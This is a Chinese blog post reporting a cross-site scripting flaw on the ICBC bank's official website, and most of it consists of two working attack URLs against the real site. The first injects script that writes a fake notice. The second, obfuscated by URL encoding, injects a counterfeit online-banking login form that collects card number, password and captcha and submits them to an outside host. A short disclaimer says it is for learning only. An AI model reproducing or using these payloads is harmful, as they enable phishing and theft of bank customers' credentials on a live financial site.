工行官方站点出现严重漏洞

 偶然间发现一篇文章介绍到工行的官方站点竟然有漏洞,本文代码均摘自http://www.phpobject.net/blog/read.php?82  主要的问题是跨域问题(XSS)还有就是对参数没有设置过滤,一个金融系统的网站尽然有如此问题有点让我害怕。

漏洞测试代码:

http://www.icbc.com.cn/click/adver/adver.jsp?para=javascript:test()";function%20test(){document.write('%B9%A4%D0%D0%BD%F4%BC%B1%CD%A8%D6%AA%A3%BA%B9%A4%D0%D0%D0%C2%CE%C5%CF%B5%CD%B3%B3%F6%CF%D6%D1%CF%D6%D8%C2%A9%B6%B4%A3%AC%D0%A1%D0%C4%B1%BB%C6%AD')}

还有一个更强的:

http://www.icbc.com.cn/click/adver/adver.jsp?para=%6A%61%76%61%73%63%72%69%70%74%3A%73%28%29%3B%66%75%6E%63%74%69%6F%6E%20%73%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%3C%74%69%74%6C%65%3E%D6%D0%B9%FA%B9%A4%C9%CC%D2%F8%D0%D0%D0%C2%D2%BB%B4%FA%CD%F8%C9%CF%D2%F8%D0%D0%3C%2F%74%69%74%6C%65%3E%3C%64%69%76%20%61%6C%69%67%6E%253Dcenter%3E%3Cform%20name%253Df%20action%253Dhttp%3A%2F%2Fwww%2E126%2Ecom%3E%3Ctable%20border%253D0%20width%253D400%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Cb%3E%3Cfont%20color%253D%2523FF0000%3E%B8%F6%C8%CB%CD%F8%C9%CF%D2%F8%D0%D0%D3%C3%BB%A7%B5%C7%C2%BC%3C%2Ffont%3E%3C%2Fb%3E%3Cp%20align%253Dcenter%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D7%A2%B2%E1%BF%A8%2F%B5%C7%C2%BCID%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dtext%20name%253Da%20size%253D19%20maxlength%253D19%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%B5%C7%C2%BC%C3%DC%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Db%20size%253D20%20maxlength%253D20%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%3E%C7%EB%CA%E4%C8%EB%D3%D2%B2%E0%CF%D4%CA%BE%B5%C4%D1%E9%D6%A4%C2%EB%A3%BA%3C%2Ftd%3E%3Ctd%3E%3Cinput%20type%253Dpassword%20name%253Dc%20size%253D4%20maxlength%253D4%3E%2526nbsp%3B%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fverifyimage%2Ejsp%3FrandomKey%253D1167791351382113206%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3C%2Ftd%3E%3C%2Ftr%3E%3Ctr%3E%3Ctd%20colspan%253D2%3E%3Cp%20align%253Dcenter%3E%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fagree%2Egif%20border%253D0%3E%3C%2Fa%3E%2526nbsp%3B%2526nbsp%3B%2526nbsp%3B%3Ca%20href%253Djavascript%3Adocument%2Ef%2Esubmit%28%29%3E%3Cimg%20src%253Dhttps%3A%2F%2Fmybank%2Eicbc%2Ecom%2Ecn%2Ficbc%2Fperbank%2Fimages%2Fdisagree%2Egif%20border%253D0%3E%3C%2Fa%3E%3C%2Ftd%3E%3C%2Ftr%3E%3C%2Ftable%3E%3C%2Fform%3E%3C%2Fdiv%3E%27%29%29%7D%2F%2F

以上代码均具有一定破坏性,只在学习提高网络安全意识。慎用,非法用途后果自负!!

其实这些都是小问题,在很多project中我们自己也会范这样的小问题,但问题就在于他是工商银行一个金融系统,真不知道他们的程序设计人员怎么考虑的,工作中没有质量安全控制吗?真危险!

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值